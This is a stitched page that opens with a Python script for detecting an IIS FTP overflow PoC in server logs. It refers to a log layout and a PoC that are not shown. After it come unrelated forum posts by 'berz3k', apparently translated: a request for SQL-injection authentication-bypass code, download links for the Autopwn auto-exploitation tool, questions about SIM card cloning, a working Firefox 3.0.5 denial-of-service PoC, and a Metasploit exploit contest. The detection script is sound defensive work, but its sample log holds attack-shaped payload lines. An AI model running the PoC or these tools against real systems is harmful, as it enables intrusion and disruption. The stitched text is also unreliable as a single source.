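An added detection example, not part of the original post: a Python script that parses MSFTPSVC log lines in the W3C layout shown above (time c-ip cs-method cs-uri-stem sc-status) and flags the traces this PoC leaves (oversized or binary SITE/MKD arguments, the wildcard NLST path, repeated rejected SITE commands, and a successful MKD by the anonymous account). The session ids and the sample log lines beyond the post's first two entries are constructed.

```python
import re
from collections import defaultdict, namedtuple

# MSFTPSVC W3C fields from the post: time c-ip cs-method cs-uri-stem sc-status.
# cs-method carries a "[n]" session prefix ("[1]USER"); sc-status may be absent.
METHOD_RE = re.compile(r"\[(\d+)\]([A-Za-z]+)$")
MAX_ARG = 256                       # the PoC sends 500-byte SITE arguments
WRITE_CMDS = {"MKD", "STOR", "APPE", "RNTO", "DELE", "RMD"}
Entry = namedtuple("Entry", "time ip session method arg status")

def parse_line(line):
    """Parse one log line into an Entry; header/directive lines return None."""
    line = line.rstrip("\r\n")
    if not line or line.startswith("#") or line.startswith("Software:"):
        return None
    parts = line.split(" ")
    m = METHOD_RE.match(parts[2]) if len(parts) >= 3 else None
    if not m:
        return None
    rest = parts[3:]
    status = int(rest.pop()) if rest and re.fullmatch(r"\d{3}", rest[-1]) else None
    return Entry(parts[0], parts[1], int(m.group(1)), m.group(2).upper(),
                 " ".join(rest), status)

def scan(lines):
    """Return (line_no, session_id, reason) for every suspicious entry."""
    findings = []
    user_of = {}                    # session id -> last USER name
    site_errors = defaultdict(int)  # session id -> SITE commands answered 500
    for no, raw in enumerate(lines, 1):
        e = parse_line(raw)
        if e is None:
            continue
        if e.method == "USER":
            user_of[e.session] = e.arg.lower()
            continue
        if len(e.arg) > MAX_ARG:
            findings.append((no, e.session, f"{e.method} argument of {len(e.arg)} bytes"))
        if any(not 0x20 <= ord(ch) <= 0x7e for ch in e.arg):
            findings.append((no, e.session, f"non-printable bytes in {e.method} argument"))
        if e.method == "NLST" and "*" in e.arg and "../" in e.arg:
            findings.append((no, e.session, "NLST with wildcard and '../' (overflow trigger shape)"))
        if e.method == "SITE" and e.status == 500:
            site_errors[e.session] += 1
            if site_errors[e.session] == 3:
                findings.append((no, e.session, "repeated rejected SITE commands (payload staging)"))
        if (e.method in WRITE_CMDS and e.status in (226, 250, 257)
                and user_of.get(e.session) == "anonymous"):
            findings.append((no, e.session, f"anonymous user succeeded at {e.method} (write access enabled)"))
    return findings

# Constructed sample log: the first two entries mirror the post's sample, the rest
# follow the PoC's MKD/SITE/NLST sequence (0x7f bytes stand in for the binary payload).
_FILL = "V" * 495
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: time c-ip cs-method cs-uri-stem sc-status",
    "22:45:13 169.254.117.152 [1]USER anonymous 331",
    "22:45:13 169.254.117.152 [1]PASS password 230",
    "22:45:14 169.254.117.152 [1]MKD w00t20560 257",
    "22:45:14 169.254.117.152 [1]SITE KSEXY" + _FILL + " 500",
    "22:45:14 169.254.117.152 [1]SITE KSEXY" + _FILL + " 500",
    "22:45:14 169.254.117.152 [1]SITE KSEXY" + _FILL + " 500",
    "22:45:15 169.254.117.152 [1]MKD CCC" + "~\x7f" * 40 + "EEEE 257",
    "22:45:15 169.254.117.152 [1]NLST CCC*/../C*/",
    "22:46:00 169.254.117.200 [2]USER alice 331",
    "22:46:01 169.254.117.200 [2]NLST /pub 226",
]

if __name__ == "__main__":
    for line_no, session, reason in scan(SAMPLE_LOG):
        print(f"line {line_no} session {session}: {reason}")
```

Feed it the real file with `scan(open(path, encoding="latin-1").read().splitlines())`; session 2 (a normal listing by a named user) produces no findings.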

5  Programming / Visual Basic Programming / Web Requests SQL Injection in VBasic on: 10 June 2009, 10:15
Well, that's it, colleagues.

I'm not that much of a fan of VBasic programming, but work is asking for it now. I've just made a basic form for GET/POST requests, but now I need some function, tips or source code you know of to make basic SQL injection requests; I'm talking about some authentication bypass, a basic union+select, etc. Ideas, links, code are welcome...

-berz3k.

6  Computer Security / Bugs and Exploits / Analysis and Exploitation with Autopwn v1.8 on: 13 April 2009, 12:10
What is Autopwn v1.8

It is a self-executing "autohack" tool with minimal interaction for remote/local exploitation based on vulnerabilities in win32 systems.

Features:

- Contains compiled exploits (binaries / executables) for the best-known bugs/vulnerabilities
- No need to debug or compile source code.
- Scans all ports 1 to 65535 (tcp); after identifying the IP, it will try all possible vulnerabilities according to the list of open ports (Openports.TXT)
- Does not require any back-end database.
- Can be used to test the effectiveness of an IDS / IPS
- Exploits are run independently and do not rely on "fingerprinting".

Download:

http://solidmecca.co.nr
http://winautopwn.co.nr
http://winautopwn.exofire.net


Tinkering with Win2k using Autopwn 1.8

Initial configuration:
 


Automatic port scan (don't despair, wait a few minutes) 1-62514



Running exploits:




-berz3k.

Bad experience with Autopwn 1.8? Any other example, maybe remote/local with another exploit?



7  Computer Security / Web Level / Tuning Firefox for Ethical Hacking on: 13 April 2009, 10:43

I think some tools are missing, but the paper adds quite a few tools to get your Firefox up to scratch (webapp auditing, webapp hacking):
http://www.security-database.com/toolswatch/IMG/pdf/Turning_Firefox_Ethical_Hacking_Platform.pdf

-berz3k.
8  Communications / Mobile Hacking / SIM card cloning on: 29 January 2009, 18:26

Well, that's it: the question has come up and I also currently have the money to do it. I'd like to know whether it's possible to do the much-discussed "SIM card cloning". For now I'm in the research phase:

1) SIM card readers: which ones do you know? Which are the best? What hardware is needed? Software?

2) SIM card cloners: which ones do you know? Which are the best? What hardware is needed? Software?

3) I once read about forensic tools and hardware for SIM cards, and also tools to investigate the phone itself. Do you know more about that? Links, software, etc.?


-berz3k.

 
9  Computer Security / Bugs and Exploits / New DoS on Firefox 3.0.5 + PoC on: 14 January 2009, 06:45
Exploit:

FireFox 3.0.5 // Windows Vista

Code:
<BODY onload="
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">

Testing Version

Code:
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5




Bug & Source reported at:
https://bugzilla.mozilla.org/show_bug.cgi?id=456727

Source:

-berz3k.


10  Computer Security / Bugs and Exploits / Exploit Development Contest for MSF on: 6 January 2009, 22:18
Well, on 4 January the call was opened to develop exploits for the Metasploit Framework. I have some code I haven't ported and some other code I've abandoned; surely many of us here are in the same situation. I encourage you to participate, develop and contribute some code; I'm opening this THREAD for that purpose and/or to do it together.

+Starts right now, until 1 February 2009

+The winner, they say:
150 Euros via PayPal on 10 February:

+Points are evaluated as:

Working DoS module: 1 point
Working WebApp module: 2 points
Working Exploit module (local/remote): 3 points
Non-public 0day exploit: a bonus of 2 points

+ Modules/exploits that are accepted will be published on the page:
https://www.securinfos.info/metasploit/msfxdc.php

with their respective name, nick and credits.

From what I see, only 2 modules have been published so far.


-berz3k.

Source:
https://www.securinfos.info/metasploit/msfxdc.php
